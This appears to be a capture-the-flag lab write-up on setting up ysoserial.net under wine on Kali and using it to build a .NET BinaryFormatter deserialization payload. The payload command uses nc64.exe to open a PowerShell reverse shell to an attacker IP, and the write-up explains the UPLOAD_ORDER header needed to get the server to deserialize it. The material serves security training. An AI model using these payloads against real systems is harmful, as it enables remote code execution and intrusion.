ysoserial.net
ysoserial.net is a collection of utilities and property-oriented programming “gadget chains” discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
this project is inspired by chris frohoff’s ysoserial project
the main options of ysoserial.net are: --gadget(-g), --formatter (-f), --output(-o) and --plugin(-p)
--gadget(-g), used to indicate the gadget to abuse (indicate the class/function that will be abused during deserialization to execute commands).--formatter(-f), used to indicated the method to serialized the exploit (you need to know which library is using the back-end to deserialize the payload and use the same to serialize it)--output(-o), used to indicate if you want the exploit in raw or base64 encoded. note that ysoserial.net will encode the payload using utf-16le (encoding used by default on Windows) so if you get the raw and just encode it from a Linux console you might have some encoding compatibility problems that will prevent the exploit from working properly (in HTB JSON box the payload worked in both UTF-16LE and ASCII but this doesn’t mean it will always work).--plugin(-p), ysoserial.net supports plugins to craft exploits for specific frameworks like ViewState
Installation
The tool is designed for Windows environment
However, it could be made to work in Linux environment with a bit more of work
The above method uses the .NET 4.8 framework via wine as the runtime library, facilitating the necessary components for ysoserial.net
┌──(kali㉿kali)-[~/Tools]
└─$ sudo apt reinstall mono-complete wine winetricks -yWhile I already have all those packages installed in my system, I will reinstall them for the sake of replication
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ wget -q https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip ; unzip ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zipI will then download the binary package of ysoserial.net
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ winetricks dotnet48
------------------------------------------------------
warning: You are using a 64-bit WINEPREFIX. Note that many verbs only install 32-bit versions of packages. If you encounter problems, please retest in a clean 32-bit WINEPREFIX before reporting a bug.
------------------------------------------------------
------------------------------------------------------
WINEPREFIX INFO:
Drive C: total 28
drwxr-xr-x 7 kali kali 4096 Dec 21 2022 .
drwxr-xr-x 4 kali kali 4096 Oct 25 23:57 ..
drwxr-xr-x 3 kali kali 4096 Sep 9 2022 ProgramData
drwxr-xr-x 6 kali kali 4096 Sep 9 2022 Program Files
drwxr-xr-x 7 kali kali 4096 Dec 21 2022 Program Files (x86)
drwxr-xr-x 4 kali kali 4096 Sep 9 2022 users
drwxr-xr-x 22 kali kali 4096 Oct 25 23:43 windows
Registry info:
/home/kali/.wine/system.reg:#arch=win64
/home/kali/.wine/user.reg:#arch=win64
/home/kali/.wine/userdef.reg:#arch=win64
------------------------------------------------------
------------------------------------------------------
warning: wine cmd.exe /c echo '%AppData%' returned empty string, error message "wine: could not load kernel32.dll, status c0000135"
------------------------------------------------------The initial dotnet48 installation failed.
This is because my older installation was made with 64-bit WINEPREFIX, and some verbs in winetricks install only 32-bit versions of packages, which may cause issues with installing dotnet48
Furthermore, an error loading the kernel32.dll file was encountered, complicating the installation process.
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ mv ~/.wine ~/.wine.oldFor a temporary solution, I will change the name of the existing wine directory so that the installation can take place
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ winetricks dotnet48Installing
It went through a lot of installations with many warnings errors, likely due to conflicting with the older installation
Nonetheless, Installation is complete
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ alias ysoserial.net='/usr/bin/wine /home/kali/Tools/ysoserial.net/ysoserial.exe'I will set the alias for ease of use
┌──(kali㉿kali)-[~/Tools/ysoserial.net]
└─$ ysoserial.net
Missing arguments. You may need to provide the command parameter even if it is being ignored.
ysoserial.net generates deserialization payloads for a variety of .NET formatters.
== GADGETS ==
(*) ActivitySurrogateDisableTypeCheck [Disables 4.8+ type protections for ActivitySurrogateSelector, command is ignored] (suppor
ts extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
(*) ActivitySurrogateSelector [This gadget ignores the command parameter and executes the constructor of ExploitClass class] (su
pports extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
(*) ActivitySurrogateSelectorFromFile [Another variant of the ActivitySurrogateSelector gadget. This gadget interprets the comma
nd parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally requ
ired assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter (2) , LosFormatter , SoapFormatter
(*) AxHostState
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
(*) BaseActivationFactory [Gadget for .NET 5/6/7 with WPF enabled or Microsoft.WindowsDesktop.App\PresentationFramework.dll avai
lable. Leads to remote DLL loading (native C/C++ DLL)]
Formatters: Json.Net
(*) ClaimsIdentity
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) ClaimsPrincipal
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) DataSet
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) DataSetOldBehaviour [This gadget targets and old behaviour of DataSet which uses XML format] (supports extra options: use th
e '--fullhelp' argument to view)
Formatters: BinaryFormatter , LosFormatter
(*) DataSetOldBehaviourFromFile [Another variant of the DataSetOldBehaviour gadget. This gadget interprets the command parameter
as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assembl
ies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter , LosFormatter
(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBi
naryFormatterJson or in the DataSetOldBehaviour gadget]
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) GenericPrincipal (supports extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter , LosFormatter
(*) GetterCompilerResults [Remote DLL loading gadget for .NET 5/6/7 with WPF enabled (mixed DLL). Local DLL loading for .NET Fra
mework if System.CodeDom is available. DLL path delivered with -c argument] (supports extra options: use the '--fullhelp' argument to vi
ew)
Formatters: Json.Net
(*) GetterSecurityException (supports extra options: use the '--fullhelp' argument to view)
Formatters: Json.Net
(*) GetterSettingsPropertyValue (supports extra options: use the '--fullhelp' argument to view)
Formatters: Json.Net , MessagePackTypeless , MessagePackTypelessLz4 , Xaml
(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , MessagePackTypeless ,
MessagePackTypelessLz4 , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
(*) ObjRef
Formatters: BinaryFormatter , LosFormatter , ObjectStateFormatter , SoapFormatter
(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
(*) RolePrincipal
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatt
er
(*) SessionSecurityToken
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatt
er
(*) SessionViewStateHistoryItem
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatt
er
(*) TextFormattingRunProperties [This normally generates the shortest payload] (supports extra options: use the '--fullhelp' arg
ument to view)
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatt
er
(*) ToolboxItemContainer
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
(*) TypeConfuseDelegate
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
(*) TypeConfuseDelegateMono [Tweaked TypeConfuseDelegate gadget to work with Mono]
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
(*) WindowsClaimsIdentity [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)] (supports extra options: use the
'--fullhelp' argument to view)
Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializ
er (3) , SoapFormatter (2)
(*) WindowsIdentity
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatt
er
(*) WindowsPrincipal
Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataCon
tractSerializer , SoapFormatter
(*) XamlAssemblyLoadFromFile [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file th
at should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClas
s.cs;System.Windows.Forms.dll'] (supports extra options: use the '--fullhelp' argument to view)
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
(*) XamlImageInfo [Gadget leads to XAML deserialization. Variant 1 (GAC) reads XAML from file (local path or UNC path can be giv
en). Variant 2 (non-GAC) delivers XAML directly, but requires Microsoft.Web.Deployment.dll] (supports extra options: use the '--fullhelp
' argument to view)
Formatters: Json.Net
== PLUGINS ==
(*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
(*) Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
(*) ApplicationTrust (Generates XML payload for the ApplicationTrust class)
(*) Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
(*) DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
(*) GetterCallGadgets (Implements arbitrary getter call gadgets for .NET Framework and .NET 5/6/7 with WPF enabled, run with -l
for more help)
(*) NetNonRceGadgets (Implements Non-RCE gadgets for .NET Framework)
(*) Resx (Generates RESX and .RESOURCES files)
(*) SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
(*) SharePoint (Generates payloads for the following SharePoint CVEs: CVE-2020-1147, CVE-2019-0604, CVE-2018-8421)
(*) ThirdPartyGadgets (Implements gadgets for 3rd Party Libraries)
(*) TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
(*) ViewState (Generates a ViewState using known MachineKey parameters)
Note: Machine authentication code (MAC) key modifier is not being used for LosFormatter in ysoserial.net. Therefore, LosFormatter (base6
4 encoded) can be used to create ObjectStateFormatter payloads.
Usage: ysoserial.exe [options]
Options:
-p, --plugin=VALUE The plugin to be used.
-o, --output=VALUE The output format (raw|base64|raw-
urlencode|base64-urlencode|hex). Default: raw
-g, --gadget=VALUE The gadget chain.
-f, --formatter=VALUE The formatter.
-c, --command=VALUE The command to be executed.
--rawcmd Command will be executed as is without `cmd /c `
being appended (anything after first space is an
argument).
-s, --stdin The command to be executed will be read from
standard input.
--bgc, --bridgedgadgetchains=VALUE
Chain of bridged gadgets separated by comma (,).
Each gadget will be used to complete the next
bridge gadget. The last one will be used in the
requested gadget. This will be ignored when
using the searchformatter argument.
-t, --test Whether to run payload locally. Default: false
--outputpath=VALUE The output file path. It will be ignored if
empty.
--minify Whether to minify the payloads where applicable.
Default: false
--ust, --usesimpletype This is to remove additional info only when
minifying and FormatterAssemblyStyle=Simple
(always `true` with `--minify` for binary
formatters). Default: true
--raf, --runallformatters
Whether to run all the gadgets with the provided
formatter (ignores gadget name, output format,
and the test flag arguments). This will search
in formatters and also show the displayed
payload length. Default: false
--sf, --searchformatter=VALUE
Search in all formatters to show relevant
gadgets and their formatters (other parameters
will be ignored).
--debugmode Enable debugging to show exception errors and
output length
-h, --help Shows this message and exit.
--fullhelp Shows this message + extra options for gadgets
and plugins and exit.
--credit Shows the credit/history of gadgets and plugins
(other parameters will be ignored).
--runmytest Runs that `Start` method of `TestingArenaHome` -
useful for testing and debugging.It runs although not perfect. Some gadgets don’t seem to work due to missing dependencies
Payload
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ ysoserial.net -f binaryformatter -g typeconfusedelegate -o base64 --minify -c 'c:\\Temp\\nc64.exe 10.10.16.8 1234 -e powershell' > payload.txtI will be using the TypeConfuseDelegate gadget, targeting the BinaryFormatter format.
Upon successful exploitation, the payload will create a reverse shell connection to Kali using the existing Netcat binary that I have placed earlier
Header String
Finally, appending the prefix header string is the last CRUTIAL step because UPLOAD_ORDER is the specific header string that actually sends out serialized objects. Anything else, such as LIST_ORDER, SUCCES, or QUIT, won’t work as the server-side program would interpret and handle the payload differently (won’t deserialize for execution).